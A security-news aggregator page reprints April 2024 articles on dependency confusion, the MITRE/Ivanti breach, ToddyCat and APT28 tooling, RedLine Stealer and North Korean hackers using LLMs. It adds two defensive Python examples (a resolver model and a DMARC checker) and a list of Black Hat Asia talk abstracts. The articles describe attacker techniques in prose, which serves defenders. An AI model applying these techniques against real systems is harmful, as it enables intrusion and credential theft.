Apache Cordova App Harness Targeted in Dependency Confusion Attack
24.4.24
Hacking
The Hacker News
Researchers have identified a dependency confusion vulnerability impacting an archived Apache project called Cordova App Harness.
Dependency confusion attacks arise when a package manager resolves an internal dependency name against the public registry as well as the private one, allowing a threat actor to publish a malicious package with the same name (typically with a higher version number) to the public package repository.
This causes the package manager to inadvertently download the fraudulent package from the public repository instead of the intended private one. If successful, it can have serious consequences, compromising every downstream consumer that installs the package.
A May 2023 analysis of npm and PyPI packages stored in cloud environments by enterprise security company Orca revealed that nearly 49% of organizations are vulnerable to a dependency confusion attack.
While npm and other package managers have since introduced fixes to prioritize the private versions, application security firm Legit Security said it found the Cordova App Harness project to reference an internal dependency named cordova-harness-client without a relative file path.
The open-source initiative was discontinued by the Apache Software Foundation (ASF) as of April 18, 2019.
As Legit Security demonstrated, this left the door wide open for a supply chain attack by uploading a malicious version under the same name with a higher version number, thus causing npm to retrieve the bogus version from the public registry.
With the bogus package attracting over 100 downloads after being uploaded to npm, it indicates that the archived project is still being put to use, likely posing severe risks to users.
In a hypothetical attack scenario, an attacker could hijack the library to serve malicious code that could be executed on the target host upon package installation.
The Apache security team has since addressed the problem by taking ownership of the cordova-harness-client package. It's worth noting that organizations are advised to register placeholder packages under their internal package names on public registries to prevent dependency confusion attacks.
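The two halves of the story above, the resolver behaviour that lets a public 99.x version beat a private 1.x one, and the placeholder advice that closes the hole, are easiest to reason about as a small resolver model. The example below is added here and is not code from Legit Security, Apache or npm; the registry contents, version numbers and the @acme scope are constructed, and only the cordova-harness-client name comes from the article.

```python
# Constructed registry contents. Versions and names other than
# cordova-harness-client are made up for the example.
PRIVATE_REGISTRY = {
    "cordova-harness-client": ["1.1.0", "1.2.0"],
    "harness-internal-utils": ["0.4.0"],
    "@acme/widgets": ["2.0.0"],
}
PUBLIC_REGISTRY = {
    "cordova-harness-client": ["99.0.0"],   # the attacker's squat, higher than anything private
    "@acme/widgets": ["9.9.9"],
    "left-pad": ["1.3.0"],
}
INTERNAL_NAMES = {"cordova-harness-client", "harness-internal-utils"}
INTERNAL_SCOPES = {"@acme"}

def _ver(v: str) -> tuple:
    return tuple(int(x) for x in v.split("."))

def resolve_naive(name: str) -> tuple:
    """Vulnerable: merge candidates from both registries, highest version wins."""
    candidates = [(v, "private") for v in PRIVATE_REGISTRY.get(name, [])]
    candidates += [(v, "public") for v in PUBLIC_REGISTRY.get(name, [])]
    if not candidates:
        raise LookupError(name)
    return max(candidates, key=lambda c: _ver(c[0]))

def resolve_pinned(name: str) -> tuple:
    """Hardened: internal names and scopes are only ever fetched from the private registry.

    Mirrors what npm's per-scope registry setting (@scope:registry=... in .npmrc)
    achieves; a public copy of an internal name is never consulted.
    """
    scope = name.split("/", 1)[0] if name.startswith("@") else None
    if name in INTERNAL_NAMES or scope in INTERNAL_SCOPES:
        versions = PRIVATE_REGISTRY.get(name)
        if not versions:
            raise LookupError(f"{name} is internal but missing from the private registry")
        return max(versions, key=_ver), "private"
    versions = PUBLIC_REGISTRY.get(name)
    if not versions:
        raise LookupError(name)
    return max(versions, key=_ver), "public"

def unclaimed_internal_names() -> list:
    """Placeholder check: internal names nobody has registered publicly are still squattable."""
    return sorted(n for n in INTERNAL_NAMES if n not in PUBLIC_REGISTRY)

if __name__ == "__main__":
    print("naive :", resolve_naive("cordova-harness-client"))
    print("pinned:", resolve_pinned("cordova-harness-client"))
    print("still unclaimed on the public registry:", unclaimed_internal_names())
```

Note that the scoped-registry pin only helps for names you control; for an archived upstream project like Cordova App Harness that never scoped its internal dependency, the only defence left was the one Apache applied, taking ownership of the public name.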
"This discovery highlights the need to consider third-party projects and dependencies as potential weak links in the software development factory, especially archived open-source projects that may not receive regular updates or security patches," security researcher Ofek Haviv said.
"Although it may seem tempting to leave them as is, these projects tend to have vulnerabilities that are not getting attention and not likely to be fixed."
Police Chiefs Call for Solutions to Access Encrypted Data in Serious Crime Cases
24.4.24
Crime
The Hacker News
European Police Chiefs said that the complementary partnership between law enforcement agencies and the technology industry is at risk due to end-to-end encryption (E2EE).
They called on the industry and governments to take urgent action to ensure public safety across social media platforms.
"Privacy measures currently being rolled out, such as end-to-end encryption, will stop tech companies from seeing any offending that occurs on their platforms," Europol said.
"It will also stop law enforcement's ability to obtain and use this evidence in investigations to prevent and prosecute the most serious crimes such as child sexual abuse, human trafficking, drug smuggling, homicides, economic crime, and terrorism offenses."
The idea that E2EE protections could stymie law enforcement is often referred to as the "going dark" problem, triggering concerns it could create new obstacles to gather evidence of nefarious activity.
The development comes against the backdrop of Meta rolling out E2EE in Messenger by default for personal calls and one-to-one personal messages as of December 2023.
The U.K. National Crime Agency (NCA) has since criticized the company's design choices, which made it harder to protect children from sexual abuse online and undermined their ability to investigate crime and keep the public safe from serious threats.
"Encryption can be hugely beneficial, protecting users from a range of crimes," NCA Director General Graeme Biggar said. "But the blunt and increasingly widespread rollout by major tech companies of end-to-end encryption, without sufficient consideration for public safety, is putting users in danger."
Europol's Executive Director Catherine de Bolle noted that tech companies have a social responsibility to develop a safe environment without hampering law enforcement's ability to collect evidence.
The joint declaration also urges the tech industry to build products keeping cybersecurity in mind, but at the same time provide a mechanism for identifying and flagging harmful and illegal content.
"We do not accept that there need be a binary choice between cybersecurity or privacy on the one hand and public safety on the other," the agencies said.
"Our view is that technical solutions do exist; they simply require flexibility from industry as well as from governments. We recognise that the solutions will be different for each capability, and also differ between platforms."
Meta, for what it's worth, already relies on a variety of signals gleaned from unencrypted information and user reports to combat child sexual exploitation on WhatsApp.
Earlier this month, the social media giant also said it's piloting a new set of features in Instagram to protect young people from sextortion and intimate image abuse using client-side scanning.
"Nudity protection uses on-device machine learning to analyze whether an image sent in a DM on Instagram contains nudity," Meta said.
"Because the images are analyzed on the device itself, nudity protection will work in end-to-end encrypted chats, where Meta won't have access to these images – unless someone chooses to report them to us."
German Authorities Issue Arrest Warrants for Three Suspected Chinese Spies
24.4.24
BigBrothers
The Hacker News
German authorities said they have issued arrest warrants against three citizens on suspicion of spying for China.
The full names of the defendants were not disclosed by the Office of the Federal Prosecutor (aka Generalbundesanwalt), but it includes Herwig F., Ina F., and Thomas R.
"The suspects are strongly suspected of working for a Chinese secret service since an unspecified date before June 2022," the Generalbundesanwalt said.
Thomas R. is believed to have acted as an agent for China's Ministry of State Security (MSS), gathering information about innovative technologies in Germany that could be used for military purposes.
The defendant also sought the help of a married couple, Herwig F. and Ina F., who run a Düsseldorf-based business that established connections with the scientific and research community in Germany.
This materialized in the form of an agreement with an unnamed German university to conduct a study for an unnamed Chinese contractor regarding the operation of high-performance marine engines for use on combat ships.
"At the time of their arrest, the defendants were in further negotiations on research projects that could be useful for expanding China's maritime combat power," the agency said.
"In addition, the defendants purchased a special laser from Germany on behalf of and with payment from the MSS and exported it to China without permission, even though the instrument is subject to the E.U. dual-use regulation."
The development comes as the Generalbundesanwalt announced the arrest of another citizen named Jian G. for acting as an agent for the Chinese Secret Service while working for a German Member of the European Parliament since 2019.
"In January 2024, the accused repeatedly passed on information about negotiations and decisions in the European Parliament to his intelligence client," it said. "In addition, he spied on Chinese opposition members in Germany for the intelligence service."
Last week, the Office of the Federal Prosecutor also executed an arrest warrant against a German-Russian citizen Alexander J. for purported secret service agent activity.
The arrests also follow the charging of Christopher Berry, 32, and Christopher Cash, 29, in the U.K. for passing on sensitive information to China in violation of the Official Secrets Act, according to the Metropolitan Police and the Crown Prosecution Service (CPS).
The two individuals, previously arrested on March 13, 2023, in Oxfordshire and Edinburgh, respectively, and later released on bail, have been accused of sharing "articles, notes, documents, or information" which may have been directly or indirectly useful to an enemy nation.
A spokesperson for the Chinese Embassy told BBC News that the allegations amount to "malicious slander" and urged the U.K. to "stop anti-China political manipulation."
U.S. Imposes Visa Restrictions on 13 Linked to Commercial Spyware Misuse
23.4.24
BigBrothers
The Hacker News
The U.S. Department of State on Monday said it's taking steps to impose visa restrictions on 13 individuals who are allegedly involved in the development and sale of commercial spyware or who are immediate family members of those involved in such businesses.
"These individuals have facilitated or derived financial benefit from the misuse of this technology, which has targeted journalists, academics, human rights defenders, dissidents and other perceived critics, and U.S. Government personnel," the department said.
The names of those subjected to visa restrictions were not disclosed, but the move comes more than two months after the U.S. government said it's enacting a new policy that enforces visa constraints on people engaging in practices that could threaten privacy and freedom of expression.
It also aims to counter the misuse and proliferation of commercial spyware that has been put to use by authoritarian governments to spy on civil society members, in addition to promoting accountability.
The development comes as Israeli publication Haaretz reported that Intellexa presented a proof-of-concept (PoC) system in 2022 called Aladdin that enabled the planting of phone spyware through online ads.
The Intellexa Consortium was sanctioned by the U.S. Department of Treasury's Office of Foreign Assets Control (OFAC) last month for "developing, operating, and distributing" commercial spyware designed to target government officials, journalists, and policy experts in the country.
It's not just spyware, as Kaspersky recently reported that 31,031 unique users were affected by stalkerware in 2023, up from 29,312 a year prior, with most of them located in Russia, Brazil, and India – a dubious distinction held by the three countries since 2019.
"Stalkerware products are typically marketed as legitimate anti-theft or parental control apps for smartphones, tablets and computers, but in reality, they are something very different. Installed without the knowledge or consent of the person being tracked, these apps operate stealthily and provide a perpetrator with the means to gain control over a victim's life," the company said.
MITRE Corporation Breached by Nation-State Hackers Exploiting Ivanti Flaws
23.4.24
Exploit
The Hacker News
The MITRE Corporation revealed that it was the target of a nation-state cyber attack that exploited two zero-day flaws in Ivanti Connect Secure appliances starting in January 2024.
The intrusion led to the compromise of its Networked Experimentation, Research, and Virtualization Environment (NERVE), an unclassified research and prototyping network.
The unknown adversary "performed reconnaissance of our networks, exploited one of our Virtual Private Networks (VPNs) through two Ivanti Connect Secure zero-day vulnerabilities, and skirted past our multi-factor authentication using session hijacking," Lex Crumpton, a defensive cyber operations researcher at the non-profit, said last week.
The attack entailed the exploitation of CVE-2023-46805 (CVSS score: 8.2) and CVE-2024-21887 (CVSS score: 9.1), which could be weaponized by threat actors to bypass authentication and run arbitrary commands on the infected system.
Upon gaining initial access, the threat actors moved laterally and breached its VMware infrastructure using a compromised administrator account, ultimately paving the way for the deployment of backdoors and web shells for persistence and credential harvesting.
"NERVE is an unclassified collaborative network that provides storage, computing, and networking resources," MITRE said. "Based on our investigation to date, there is no indication that MITRE's core enterprise network or partners' systems were affected by this incident."
The organization said that it has since taken steps to contain the incident, and that it undertook response and recovery efforts as well as forensic analysis to identify the extent of the compromise.
The initial exploitation of the twin flaws has been attributed to a cluster tracked by cybersecurity company Volexity under the name UTA0178, a nation-state actor likely linked to China. Since then, several other China-nexus hacking groups have joined the exploitation bandwagon, according to Mandiant.
"No organization is immune from this type of cyber attack, not even one that strives to maintain the highest cybersecurity possible," Jason Providakes, president and CEO of MITRE, said.
"We are disclosing this incident in a timely manner because of our commitment to operate in the public interest and to advocate for best practices that enhance enterprise security as well as necessary measures to improve the industry's current cyber defense posture."
ToddyCat Hacker Group Uses Advanced Tools for Industrial-Scale Data Theft
23.4.24
APT
The Hacker News
The threat actor known as ToddyCat has been observed using a wide range of tools to retain access to compromised environments and steal valuable data.
Russian cybersecurity firm Kaspersky characterized the adversary as relying on various programs to harvest data on an "industrial scale" from primarily governmental organizations, some of them defense related, located in the Asia-Pacific region.
"To collect large volumes of data from many hosts, attackers need to automate the data harvesting process as much as possible, and provide several alternative means to continuously access and monitor systems they attack," security researchers Andrey Gunkin, Alexander Fedotov, and Natalya Shornikova said.
ToddyCat was first documented by the company in June 2022 in connection with a series of cyber attacks aimed at government and military entities in Europe and Asia since at least December 2020. These intrusions leveraged a passive backdoor dubbed Samurai that allows for remote access to the compromised host.
A closer examination of the threat actor's tradecraft has since uncovered additional data exfiltration tools like LoFiSe and Pcexter to gather data and upload archive files to Microsoft OneDrive.
The latest set of programs entails a mix of tunneling and data-gathering software, which is put to use after the attacker has already obtained access to privileged user accounts on the infected system. This includes -
Reverse SSH tunnel using OpenSSH
SoftEther VPN, which is renamed to seemingly innocuous files like "boot.exe," "mstime.exe," "netscan.exe," and "kaspersky.exe"
Ngrok and Krong to encrypt and redirect command-and-control (C2) traffic to a certain port on the target system
FRP client, an open-source Golang-based fast reverse proxy
Cuthead, a .NET compiled executable to search for documents matching a specific extension or filename, or the date when they were modified
WAExp, a .NET program to capture data associated with the WhatsApp web app and save it as an archive, and
TomBerBil to extract cookies and credentials from web browsers like Google Chrome and Microsoft Edge
Maintaining multiple simultaneous connections from the infected endpoints to actor-controlled infrastructure using different tools is seen as a fallback mechanism and a way to retain access in cases where one of the tunnels is discovered and taken down.
"The attackers are actively using techniques to bypass defenses in an attempt to mask their presence in the system," Kaspersky said.
"To protect the organization's infrastructure, we recommend adding to the firewall denylist the resources and IP addresses of cloud services that provide traffic tunneling. In addition, users must be required to avoid storing passwords in their browsers, as it helps attackers to access sensitive information."
Russia's APT28 Exploited Windows Print Spooler Flaw to Deploy 'GooseEgg' Malware
23.4.24
APT
The Hacker News
The Russia-linked nation-state threat actor tracked as APT28 weaponized a security flaw in the Microsoft Windows Print Spooler component to deliver a previously unknown custom malware called GooseEgg.
The post-compromise tool, which is said to have been used since at least June 2020 and possibly as early as April 2019, leveraged a now-patched flaw that allowed for privilege escalation (CVE-2022-38028, CVSS score: 7.8).
It was addressed by Microsoft as part of updates released in October 2022, with the U.S. National Security Agency (NSA) credited for reporting the flaw at the time.
According to new findings from the tech giant's threat intelligence team, APT28 – also called Fancy Bear and Forest Blizzard (formerly Strontium) – weaponized the bug in attacks targeting Ukrainian, Western European, and North American government, non-governmental, education, and transportation sector organizations.
"Forest Blizzard has used the tool [...] to exploit the CVE-2022-38028 vulnerability in Windows Print Spooler service by modifying a JavaScript constraints file and executing it with SYSTEM-level permissions," the company said.
"While a simple launcher application, GooseEgg is capable of spawning other applications specified at the command line with elevated permissions, allowing threat actors to support any follow-on objectives such as remote code execution, installing a backdoor, and moving laterally through compromised networks."
Forest Blizzard is assessed to be affiliated with Unit 26165 of the Russian Federation's military intelligence agency, the Main Intelligence Directorate of the General Staff of the Armed Forces of the Russian Federation (GRU).
Active for nearly 15 years, the Kremlin-backed hacking group's activities are predominantly geared towards intelligence collection in support of Russian government foreign policy initiatives.
In recent months, APT28 hackers have also abused a privilege escalation flaw in Microsoft Outlook (CVE-2023-23397, CVSS score: 9.8) and a code execution bug in WinRAR (CVE-2023-38831, CVSS score: 7.8), indicating their ability to swiftly adopt public exploits into their tradecraft.
"Forest Blizzard's objective in deploying GooseEgg is to gain elevated access to target systems and steal credentials and information," Microsoft said. "GooseEgg is typically deployed with a batch script."
The GooseEgg binary supports commands to trigger the exploit and launch either a provided dynamic-link library (DLL) or an executable with elevated permissions. It also verifies if the exploit has been successfully activated using the whoami command.
The disclosure comes as IBM X-Force revealed new phishing attacks orchestrated by the Gamaredon actor (aka Aqua Blizzard, Hive0051, and UAC-0010) that deliver new iterations of the GammaLoad malware -
GammaLoad.VBS, which is a VBS-based backdoor initiating the infection chain
GammaStager, which is used to download and execute a series of Base64-encoded VBS payloads
GammaLoadPlus, which is used to run .EXE payloads
GammaInstall, which serves as the loader for a known PowerShell backdoor referred to as GammaSteel
GammaLoad.PS, a PowerShell implementation of GammaLoad
GammaLoadLight.PS, a PowerShell variant that contains code to spread itself to connected USB devices
GammaInfo, a PowerShell-based enumeration script collecting various information from the host
GammaSteel, a PowerShell-based malware to exfiltrate files from a victim based on an extension allowlist
"Hive0051 rotates infrastructure through synchronized DNS fluxing across multiple channels including Telegram, Telegraph and Filetransfer.io," IBM X-Force researchers said earlier this month, stating it "points to a potential elevation in actor resources and capability devoted to ongoing operations."
"It is highly likely Hive0051's consistent fielding of new tools, capabilities and methods for delivery facilitate an accelerated operations tempo."
Microsoft Warns: North Korean Hackers Turn to AI-Fueled Cyber Espionage
22.4.24
AI
The Hacker News
Microsoft has revealed that North Korea-linked state-sponsored cyber actors have begun to use artificial intelligence (AI) to make their operations more effective and efficient.
"They are learning to use tools powered by AI large language models (LLM) to make their operations more efficient and effective," the tech giant said in its latest report on East Asia hacking groups.
The company specifically highlighted a group named Emerald Sleet (aka Kimsuky or TA427), which has been observed using LLMs to bolster spear-phishing efforts aimed at Korean Peninsula experts.
The adversary is also said to have relied on the latest advancements in AI to research vulnerabilities and conduct reconnaissance on organizations and experts focused on North Korea, joining hacking crews from China, who have turned to AI-generated content for influence operations.
It further employed LLMs to troubleshoot technical issues, conduct basic scripting tasks, and draft content for spear-phishing messages, Redmond said, adding it worked with OpenAI to disable accounts and assets associated with the threat actor.
According to a report published by enterprise security firm Proofpoint last week, the group "engages in benign conversation starter campaigns to establish contact with targets for long-term exchanges of information on topics of strategic importance to the North Korean regime."
Kimsuky's modus operandi involves leveraging think tank and non-governmental organization-related personas to legitimize its emails and increase the likelihood of success of the attack.
In recent months, however, the nation-state actor has begun to abuse lax Domain-based Message Authentication, Reporting, and Conformance (DMARC) policies to spoof various personas and incorporate web beacons (i.e., tracking pixels) for target profiling, indicating its "agility in adjusting its tactics."
"The web beacons are likely intended as initial reconnaissance to validate targeted emails are active and to gain fundamental information about the recipients' network environments, including externally visible IP addresses, User-Agent of the host, and time the user opened the email," Proofpoint said.
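The lax DMARC policies the article says Kimsuky abuses are easy to spot from the published record alone. The following checker is an added example, not code from the article or from Proofpoint; the records it evaluates are constructed strings in the format a TXT lookup of _dmarc.<domain> returns, and the "lax" threshold (anything short of p=reject with full coverage) is this example's own choice.

```python
"""Classify DMARC TXT records by how well they resist sender spoofing.

Added example (not from the article). SAMPLE_RECORDS are constructed;
in practice the record comes from a DNS TXT query for _dmarc.<domain>.
"""

# Constructed sample records as they would appear in _dmarc.<domain> TXT.
SAMPLE_RECORDS = {
    "lax.example": "v=DMARC1; p=none; rua=mailto:dmarc@lax.example",
    "partial.example": "v=DMARC1; p=quarantine; pct=25; sp=none",
    "strict.example": "v=DMARC1; p=reject; sp=reject; pct=100; rua=mailto:r@strict.example",
    "missing.example": "",  # no record published at all
}


def parse_dmarc(record: str) -> dict:
    """Split 'tag=value; tag=value' into a dict with lower-cased tag names."""
    tags = {}
    for part in record.split(";"):
        part = part.strip()
        if "=" not in part:
            continue  # empty segment or malformed tag; ignored
        key, value = part.split("=", 1)
        tags[key.strip().lower()] = value.strip()
    return tags


def assess_dmarc(record: str) -> dict:
    """Return the effective policy fields plus a list of weaknesses found."""
    weaknesses = []
    tags = parse_dmarc(record)
    if tags.get("v", "").upper() != "DMARC1":
        return {"present": False,
                "weaknesses": ["no DMARC record: receivers apply no policy"]}

    p = tags.get("p", "").lower()
    sp = tags.get("sp", p).lower()  # per RFC 7489, sp defaults to p
    try:
        pct = int(tags.get("pct", "100"))
    except ValueError:
        pct = 100
        weaknesses.append("pct is not an integer; treated as 100")

    if p not in ("none", "quarantine", "reject"):
        weaknesses.append(f"invalid or missing p tag ({p!r}); record is unusable")
    elif p == "none":
        weaknesses.append("p=none: failures are only reported, spoofed mail is still delivered")
    if sp == "none" and p != "none":
        weaknesses.append("sp=none: subdomains can be spoofed although the apex is protected")
    if pct < 100:
        weaknesses.append(f"pct={pct}: policy applied to only {pct}% of failing messages")
    if "rua" not in tags:
        weaknesses.append("no rua: no aggregate reports, so spoofing attempts go unnoticed")

    return {"present": True, "p": p, "sp": sp, "pct": pct, "weaknesses": weaknesses}


def is_lax(record: str) -> bool:
    """True when mail spoofing this domain would still reach inboxes.

    Threshold chosen for this example: absent record, p other than reject,
    sp=none, or a pct below 100 all count as lax.
    """
    result = assess_dmarc(record)
    if not result["present"]:
        return True
    return result["p"] != "reject" or result["sp"] == "none" or result["pct"] < 100


if __name__ == "__main__":
    for domain, record in SAMPLE_RECORDS.items():
        verdict = "LAX" if is_lax(record) else "ok"
        print(f"{domain:18} {verdict:4} {assess_dmarc(record)['weaknesses']}")
```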
The development comes as North Korean hacking groups are continuing to engage in cryptocurrency heists and supply chain attacks, with a threat actor dubbed Jade Sleet linked to the theft of at least $35 million from an Estonian crypto firm in June 2023 and over $125 million from a Singapore-based cryptocurrency platform a month later.
Jade Sleet, which overlaps with clusters tracked as TraderTraitor and UNC4899, has also been observed attacking online cryptocurrency casinos in August 2023, not to mention leveraging bogus GitHub repos and weaponized npm packages to single out employees of cryptocurrency and technology organizations.
In another instance, a Germany-based IT company was compromised by Diamond Sleet (aka Lazarus Group) in August 2023 and weaponized an application from a Taiwan-based IT firm to conduct a supply chain attack in November 2023.
"This is likely to generate revenue, principally for its weapons program, in addition to collecting intelligence on the United States, South Korea, and Japan," Clint Watts, general manager of the Microsoft Threat Analysis Center (MTAC), said.
The Lazarus Group is also notable for employing intricate methods like Windows Phantom DLL Hijacking and Transparency, Consent, and Control (TCC) database manipulation in Windows and macOS, respectively, to undermine security protections and deploy malware, contributing to its sophistication and elusive nature, per Interpres Security.
The findings come against the backdrop of a new campaign orchestrated by the Konni (aka Vedalia) group that uses Windows shortcut (LNK) files to deliver malicious payloads.
"The threat actor utilized double extensions to conceal the original .lnk extension, with the LNK files observed containing excessive whitespace to obscure the malicious command lines," Symantec said. "As part of the attack vector, the command line script searched for PowerShell to bypass detection and locate embedded files and the malicious payload."
New RedLine Stealer Variant Disguised as Game Cheats Using Lua Bytecode for Stealth
22.4.24
Virus
The Hacker News
A new information stealer has been found leveraging Lua bytecode for added stealth and sophistication, findings from McAfee Labs reveal.
The cybersecurity firm has assessed it to be a variant of a known malware called RedLine Stealer owing to the fact that the command-and-control (C2) server IP address has been previously identified as associated with the malware.
RedLine Stealer, first documented in March 2020, is typically delivered via email and malvertising campaigns, either directly or via exploit kits and loader malware like dotRunpeX and HijackLoader.
The off-the-shelf malware is capable of harvesting information from cryptocurrency wallets, VPN software, and web browsers, such as saved credentials, autocomplete data, credit card information, and geolocations based on the victims' IP addresses.
Over the years, RedLine Stealer has been co-opted by several threat actors into their attack chains, making it a prevalent strain spanning North America, South America, Europe, Asia, and Australia.
The infection sequence identified by McAfee abuses GitHub, using two of Microsoft's official repositories for its implementation of the C++ Standard Library (STL) and vcpkg to host the malware-laden payload in the form of ZIP archives.
It's currently not known how the files came to be uploaded to the repository, but the technique is a sign that threat actors are weaponizing the trust associated with trustworthy repositories to distribute malware. The ZIP files are no longer available for download from the Microsoft repositories.
The ZIP archives ("Cheat.Lab.2.7.2.zip" and "Cheater.Pro.1.6.0.zip") masquerade as game cheats, indicating that gamers are likely the target of the campaign. Each comes fitted with an MSI installer that's designed to run the malicious Lua bytecode.
"This approach provides the advantage of obfuscating malicious strings and avoiding the use of easily recognizable scripts like wscript, JScript, or PowerShell script, thereby enhancing stealth and evasion capabilities for the threat actor," researchers Mohansundaram M. and Neil Tyagi said.
In an attempt to pass the malware to other systems, the MSI installer displays a message urging the victim to share the program with their friends in order to get the unlocked version of the software.
The "compiler.exe" executable within the installer, upon running the Lua bytecode embedded within the "readme.txt" file present in the ZIP archive, sets up persistence on the host using a scheduled task and drops a CMD file, which, in turn, runs "compiler.exe" under another name "NzUw.exe."
In the final stage, "NzUw.exe" initiates communications with a command-and-control (C2) server over HTTP, the aforementioned IP address attributed to RedLine.
The malware functions more like a backdoor, carrying out tasks fetched from the C2 server (e.g., taking screenshots) and exfiltrating the results back to it.
The exact method by which the links to the ZIP archives are distributed is presently unknown. Earlier this month, Checkmarx revealed how threat actors are taking advantage of GitHub's search functionality to trick unsuspecting users into downloading malware-laden repositories.
The development comes as Recorded Future detailed a "large-scale Russian-language cybercrime operation" that singles out the gaming community and leverages fake Web3 gaming lures to deliver malware capable of stealing sensitive information from macOS and Windows users, a technique called trap phishing.
"The campaign involves creating imitation Web3 gaming projects with slight name and branding modifications to appear legitimate, along with fake social media accounts to bolster their authenticity," Insikt Group said.
"The main webpages of these projects offer downloads that, once installed, infect devices with various types of "infostealer" malware such as Atomic macOS Stealer (AMOS), Stealc, Rhadamanthys, or RisePro, depending on the operating system."
It also follows a wave of malware campaigns targeting enterprise environments with loaders such as PikaBot and a new strain called NewBot Loader.
"Attackers demonstrated a diverse range of techniques and infection vectors in each campaign, aiming to deliver the PikaBot payload," McAfee said.
This includes a phishing attack that takes advantage of email conversation hijacking and a Microsoft Outlook flaw called MonikerLink (CVE-2024-21413) to entice victims into downloading the malware from an SMB share.
BLACKHAT 2024 ASIA
20.4.24 BLACKHAT 2024 ASIA CONFERENCE
20.4.24 | Cloud Console Cartographer: Tapping Into Mapping > Slogging Thru Logging | Event logs are a fundamental resource for security professionals seeking to understand the activity occurring in an environment. Cloud logs serve a similar purpose as their on-premise counterparts, though differing significantly in format and granularity between cloud providers. | Congress |
20.4.24 | One Flip is All It Takes: Identifying Syscall-Guard Variables for Data-Only Attacks | As control-flow protection techniques are widely deployed, it is difficult for attackers to modify control data, like function pointers, to hijack program control flow. Instead, data-only attacks corrupt security-related non-control data (critical data), and can bypass all control-flow protections to revive severe attacks. | Congress |
20.4.24 | What the TrustZone-M Doesn't See, the MCU Does Grieve Over: Lessons Learned from Assessing a Microcontroller TEE | Arm Cortex-M Microcontrollers (MCUs) are the de facto computing units powering billions of small embedded and Internet of Things (IoT) devices. Recently, as a step towards securing devices at scale, Arm introduced the TrustZone technology in the latest generation of their Armv8-M MCUs (e.g., Cortex-M33). | Congress |
20.4.24 | You Shall Not PASS - Analysing a NSO iOS Spyware Sample | In September 2023 Apple released iOS 16.6.1 closing actively exploited vulnerabilities. On the same day, CitizenLab released a new blog post about NSO's latest Exploit called BLASTPASS. | Congress |
20.4.24 | LLM4Shell: Discovering and Exploiting RCE Vulnerabilities in Real-World LLM-Integrated Frameworks and Apps | In the rapidly evolving landscape of Large Language Models (LLMs), their integration into applications is becoming increasingly common. However, this integration, often facilitated by frameworks such as LangChain and LlamaIndex, poses significant security risks. | Congress |
20.4.24 | The Hole in Sandbox: Escape Modern Web-Based App Sandbox From Site-Isolation Perspective | Process isolation is a crucial security feature in the Chrome browser. In the early stages, process isolation was only implemented as out-of-process render (Sandboxed Renderer). With the emergence of new attack methods such as UXSS and Spectre, which can steal or speculate on data from the render process, Chrome introduced the concept of Site Isolation, advocating for a more refined process isolation. | Congress |
20.4.24 | The Key to Remote Vehicle Control: Autonomous Driving Domain Controller | Among these developments, the Autonomous Driving Domain Controller is a crucial part. Many smart cars use AI chips like Nvidia Orin and Mobileye EQ5. They employ high-precision GPS, multiple cameras, LiDAR, and other sensors to sense and locate their surroundings, making decisions using algorithms. They control the car's movements, like braking and steering, by sending and receiving CAN messages. | Congress |
20.4.24 | Magicdot: A Hacker's Magic Show of Disappearing Dots and Spaces | Backwards compatibility is a key element in Windows. To support that, some known issues stay unfixed for years. We encountered such an issue when we ended a file name with a dot using the NT API. Surprisingly, we couldn't delete, write or rename it. Then, we created a similarly named file without the dot, and like magic, file operations on the first file affected the new file. | Congress |
20.4.24 | A Glimpse Into The Protocol: Fuzz Windows RDP Client For Fun And Profit | At the end of June 2023, we decided to conduct vulnerability research on the Windows RDP client. Initially, we read some publicly available blogs and modified two open-source Windows RDP fuzzing projects. During this process, we successfully identified an old Windows RDP client vulnerability but did not discover any new vulnerabilities. | Congress |
20.4.24 | CertifiedDCOM: The Privilege Escalation Journey to Domain Admin with DCOM | Over the past few years, DCOM received a lot of attention in Windows security research. The "Potato" exploits (RottenPotato, JuicyPotato, RoguePotato, RemotePotato, and LocalPotato) and Kerberos Relay attack are both impressive research in this area. | Congress |
20.4.24 | Operation PoisonedApple: Tracing Credit Card Information Theft to Payment Fraud | So far, the card information theft groups we are familiar with have typically engaged in illegal replication of stolen cards or selling them on carding shops and the dark web for financial gain. However, the threat group we've been tracking over the past few months has shown some differences. | Congress |
20.4.24 | Bad Randomness: Protecting Against Cryptography's Perfect Crime | Crypto systems are the cornerstone of our digital security infrastructure, whether they are used to encrypt our data to protect their confidentiality or for signing to prove data authenticity. | Congress |
20.4.24 | Confused Learning: Supply Chain Attacks through Machine Learning Models | All across the world, everyone is pedal-to-the-metal on machine intelligence, almost as though we're still assembling the plane mid-flight. With that being said, there's a lot about machine learning models that might surprise you and definitely surprises many ML and security engineers. | Congress |
20.4.24 | Privacy Detective: Sniffing Out Your Data Leaks for Android | Privacy data protection has become a major concern within regions, such as Europe, where GDPR is implemented. To discover the potentially privacy-infringing behaviors, manufacturers must test applications for compliance before release. | Congress |
20.4.24 | China's Military Cyber Operations: Has the Strategic Support Force Come of Age? | China's military cyber operations have showcased a noticeable strategic shift in recent years. The Strategic Support Force (SSF) – the joint information warfare (IW) command of the People's Liberation Army (PLA) – is gradually finding its ground. | Congress |
20.4.24 | The Fault in Our Metrics: Rethinking How We Measure Detection & Response | Your metrics are boring and dangerous. Recycled slides with meaningless counts of alerts, incidents, true and false positives… SNOOZE. Even worse, it's motivating your team to distort the truth and subvert progress. This talk is your wake-up call to rethink your detection and response metrics. | Congress |
20.4.24 | How to Make Hugging Face to Hug Worms: Discovering and Exploiting Unsafe Pickle.loads over Pre-Trained Large Model Hubs | Hugging Face (HF) has emerged as a popular open platform for maintaining and sharing pre-trained machine learning (ML) models. It fully understands the pickle model deserialization threats originally introduced by Pytorch and accordingly implements pickle scanning for mitigation. In October 2022, Pytorch patched such a threat by white-listing weights-only modules. | Congress |
20.4.24 | The Final Chapter: Unlimited ways to bypass your macOS privacy mechanisms | In this talk we return for a third time to talk about bypassing macOS's privacy mechanisms. In the last 4 years we submitted over 100 vulnerabilities to Apple which allowed us to either fully or partially bypass macOS's privacy protection framework (TCC). We gave talks about our findings and various techniques in previous BlackHat conferences. | Congress |
20.4.24 | Unveiling the Cracks in Virtualization, Mastering the Host System--VMware Workstation Escape | VMware Workstation is used by software developers and network security practitioners. Users can run dangerous programs in it without affecting the host system. However, if these programs can escape, the host system is no longer safe. If APT attack organizations exploit these vulnerabilities to attack these practitioners, it would be a disaster. | Congress |
